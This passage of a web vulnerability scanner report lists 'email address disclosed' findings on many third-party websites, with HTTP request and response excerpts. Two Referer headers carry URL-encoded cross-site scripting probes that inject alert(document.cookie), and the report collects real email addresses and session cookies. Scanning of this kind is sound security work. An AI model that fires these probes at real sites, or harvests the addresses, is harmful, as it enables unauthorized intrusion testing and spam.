Beer and Joomla!Cake

..
For more info contact Joomla Users group Dublin at info@emc23.com
..">
...[SNIP]...

24.102. http://security.freebsd.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://security.freebsd.org
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • FreeBSD-announce@FreeBSD.org
  • FreeBSD-security-notifications@FreeBSD.org
  • FreeBSD-security@FreeBSD.org
  • cperciva@FreeBSD.org
  • rwatson@FreeBSD.org
  • secteam@FreeBSD.org
  • security-officer@FreeBSD.org
  • simon@FreeBSD.org

Request

GET / HTTP/1.1
Host: security.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 12:33:23 GMT
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:35:15 GMT
ETag: "290a48-4f67-c85be6c0"
Accept-Ranges: bytes
Content-Length: 20327
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:secteam@FreeBSD.org">
...[SNIP]...
<a
href="mailto:security-officer@FreeBSD.org">
...[SNIP]...
<a
href="mailto:security-officer@FreeBSD.org">&lt;security-officer@FreeBSD.org&gt;</a>
...[SNIP]...
<a
href="mailto:cperciva@FreeBSD.org">&lt;cperciva@FreeBSD.org&gt;</a>
...[SNIP]...
<a
href="mailto:simon@FreeBSD.org">&lt;simon@FreeBSD.org&gt;</a>
...[SNIP]...
<a
href="mailto:rwatson@FreeBSD.org">&lt;rwatson@FreeBSD.org&gt;</a>
...[SNIP]...
<a
href="mailto:secteam@FreeBSD.org">&lt;secteam@FreeBSD.org&gt;</a>
...[SNIP]...
<li>FreeBSD-security-notifications@FreeBSD.org</li>

<li>FreeBSD-security@FreeBSD.org</li>

<li>FreeBSD-announce@FreeBSD.org</li>
...[SNIP]...

24.103. http://shop.parenthood.com/blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.parenthood.com
Path:   /blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/

Issue detail

The following email address was disclosed in the response:
  • Ronna.Mandel@parenthood.com

Request

GET /blog/goodreadds/2011/01/19/udderly-hysterical-amazing-cow-contest/ HTTP/1.1
Host: shop.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://shop.parenthood.com/blog/goodreadds/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<head profile="http://g
...[SNIP]...
<a href="mailto:Ronna.Mandel@parenthood.com">
...[SNIP]...

24.104. http://simonwillison.net/2004/May/26/addLoadEvent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://simonwillison.net
Path:   /2004/May/26/addLoadEvent/

Issue detail

The following email address was disclosed in the response:
  • kvbhaskar_dotnet@hotmail.com

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.4
Date: Tue, 25 Jan 2011 13:16:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Tue, 25 Jan 2011 13:16:12 GMT
Vary: Cookie
Last-Modified: Tue, 25 Jan 2011 13:14:12 GMT
ETag: 62572f46c0e2e4374a72e5ad7c169014
Cache-Control: max-age=120
Set-Cookie: openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";
Content-Length: 63053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Executing JavaSc
...[SNIP]...
<a href="http://kvbhaskar_dotnet@hotmail.com" rel="nofollow">
...[SNIP]...

24.105. http://sites.inka.de/~bigred/sw/c-nocem.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sites.inka.de
Path:   /~bigred/sw/c-nocem.html

Issue detail

The following email address was disclosed in the response:
  • olaf@bigred.inka.de

Request

GET /~bigred/sw/c-nocem.html HTTP/1.1
Host: sites.inka.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache/1.3.9 (Unix) Debian/GNU
Connection: close
Content-Type: text/html
Content-Length: 14464

<HTML>
<HEAD>
<TITLE>c-nocem - NoCeM for C News and INN</TITLE>
<LINK REV="made" HREF="mailto:olaf@bigred.inka.de">
<!-- $Id: c-nocem.html,v 1.11 2001/05/22 12:50:32 olaf Exp $ -->
</HEAD>

<BODY>

<h
...[SNIP]...

24.106. http://sourceforge.net/projects/nzbget/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/nzbget/

Issue detail

The following email address was disclosed in the response:
  • mytextstreasure@sf.net

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca0eb1000c61; expires="Thu, 21-Jan-2021 16:02:32 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 40706
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Consume Server: sfs-consume-2 -->
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img alt="My Text is Treasure icon" src="http://a.fsdn.com/con/icons/my/mytextstreasure@sf.net/MyTextIsTreasure_48.png"/>
...[SNIP]...

24.107. https://spreadsheets0.google.com/embeddedform

Summary

Severity:   Information
Confidence:   Certain
Host:   https://spreadsheets0.google.com
Path:   /embeddedform

Issue detail

The following email address was disclosed in the response:
  • personal.knowledge@corporate.com

Request

GET /embeddedform?formkey=dEs0YWVVdGdhd05ZeFpYQXNtcU5uN0E6MQ HTTP/1.1
Host: spreadsheets0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:18:41 GMT
Expires: Tue, 25 Jan 2011 13:18:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>Site Removal, Redaction
...[SNIP]...
<label class="ss-q-help" for="entry_3">personal.knowledge@corporate.com</label>
...[SNIP]...

24.108. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The following email address was disclosed in the response:
  • chris@ozmm.org

Request

GET /wp-content/themes/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 01 Apr 2009 13:22:39 GMT
ETag: "1c4ace-19af-4667e35a8a5c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 6575

/*
* Facebox (for jQuery)
* version: 1.1 (03/01/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

24.109. http://static.sourceforge.net/include/jquery/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.sourceforge.net
Path:   /include/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:
  • klaus.hartl@stilbuero.de

Request

GET /include/jquery/jquery.cookie.js HTTP/1.1
Host: static.sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/softwaremap/?a3f06%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8a4aedca02f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=191645736.1294170970.1.1.utmcsr=tortoisesvn.net|utmccn=(referral)|utmcmd=referral|utmcct=/downloads.html; __utma=191645736.1617461905.1294170970.1294170970.1294170970.1

Response

HTTP/1.1 200 OK
Expires: Tue, 25 Jan 2011 04:10:25 GMT
Cache-Control: max-age=7200
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "1010752638"
Last-Modified: Wed, 27 Oct 2010 22:22:57 GMT
Content-Length: 4247
Date: Tue, 25 Jan 2011 02:10:25 GMT
Server: lighttpd/1.4.26

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

24.110. http://tantek.com/log/2004/09.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tantek.com
Path:   /log/2004/09.html

Issue detail

The following email addresses were disclosed in the response:
  • rsvp@technorati.com
  • wsg@webstandardsgroup.org

Request

GET /log/2004/09.html HTTP/1.1
Host: tantek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:20:12 GMT
Server: Apache/2
Last-Modified: Sat, 26 Sep 2009 04:25:11 GMT
ETag: "1386a2-18594-474737347f7c0"
Accept-Ranges: bytes
Content-Length: 99732
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us"><head profile="h
...[SNIP]...
<a href="mailto:rsvp@technorati.com">rsvp@technorati.com</a>
...[SNIP]...
<a href="http://www.mail-archive.com/wsg@webstandardsgroup.org/msg08154.html">
...[SNIP]...

24.111. http://thenextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • tips@thenextweb.com

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 127.0.0.1
Set-Cookie: PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 102006
Date: Tue, 25 Jan 2011 13:27:48 GMT
Age: 665
Connection: close
X-Cache: HIT

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>The Next Web | TNW is the International Source for Internet Ne
...[SNIP]...
<a href="mailto:tips@thenextweb.com">tips@thenextweb.com</a>
...[SNIP]...

24.112. http://tweetmeme.com/about/advertising/display

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/display

Issue detail

The following email addresses were disclosed in the response:
  • sales@tweetmeme.com
  • salesinquiries@federatedmedia.net

Request

GET /about/advertising/display HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010180473327637
X-Served-In: 0.0058400630950928
X-Served-By: h01
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Dis
...[SNIP]...
<a href="mailto:salesinquiries@federatedmedia.net">
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.113. http://tweetmeme.com/about/advertising/featured_tweets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/featured_tweets

Issue detail

The following email address was disclosed in the response:
  • sales@tweetmeme.com

Request

GET /about/advertising/featured_tweets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:59 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00012493133544922
X-Served-In: 0.0067188739776611
X-Served-By: h00
Content-Length: 23493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Fea
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.114. http://tweetmeme.com/about/advertising/retweet_ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/retweet_ads

Issue detail

The following email address was disclosed in the response:
  • sales@tweetmeme.com

Request

GET /about/advertising/retweet_ads HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0059108734130859
X-Served-By: h03
Content-Length: 23166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ret
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.115. http://tweetmeme.com/about/channels

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/channels

Issue detail

The following email address was disclosed in the response:
  • sales@tweetmeme.com

Request

GET /about/channels HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.9897384643555E-5
X-Served-In: 0.0062339305877686
X-Served-By: ded2059
Content-Length: 22892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Cha
...[SNIP]...
<a href="mailto:sales@tweetmeme.com">sales@tweetmeme.com</a>
...[SNIP]...

24.116. http://tweetmeme.com/about/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/privacy

Issue detail

The following email address was disclosed in the response:
  • support@tweetmeme.com

Request

GET /about/privacy HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00013995170593262
X-Served-In: 0.0065500736236572
X-Served-By: h02
Content-Length: 23922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Pri
...[SNIP]...
<a href="mailto:support@tweetmeme.com">support@tweetmeme.com</a>
...[SNIP]...

24.117. http://tweetmeme.com/scripts/search.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /scripts/search.xml

Issue detail

The following email address was disclosed in the response:
  • support@tweetmeme.com

Request

GET /scripts/search.xml HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:06 GMT
Content-Type: text/xml
Last-Modified: Fri, 12 Feb 2010 14:26:33 GMT
Connection: close
Expires: Mon, 24 Jan 2011 22:51:06 GMT
Cache-Control: max-age=1800
X-Served-By: h02
Content-Length: 1041

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>TweetMeme</ShortName>
<LongName>TweetMeme Search</LongName>
<Descript
...[SNIP]...
<Contact>support@tweetmeme.com</Contact>
...[SNIP]...

24.118. http://tweetmeme.com/user/alexia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/alexia

Issue detail

The following email address was disclosed in the response:
  • alexia@techcrunch.com

Request

GET /user/alexia HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044820308685303
X-Served-In: 1.8648369312286
X-Served-By: h01
Content-Length: 39176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
ale
...[SNIP]...
<meta name="description" content="Writer at TechCrunch. Breaks news, hearts. alexia@techcrunch.com" />
...[SNIP]...
<span class="bio">
Writer at TechCrunch. Breaks news, hearts. alexia@techcrunch.com </span>
...[SNIP]...

24.119. http://twitter.com/7News/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910395-49850-63408
ETag: "85cdef8719ba6d07512d0d99ffbc30f1"
Last-Modified: Mon, 24 Jan 2011 23:06:35 GMT
X-Runtime: 0.00972
Content-Type: text/html; charset=utf-8
Content-Length: 54324
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
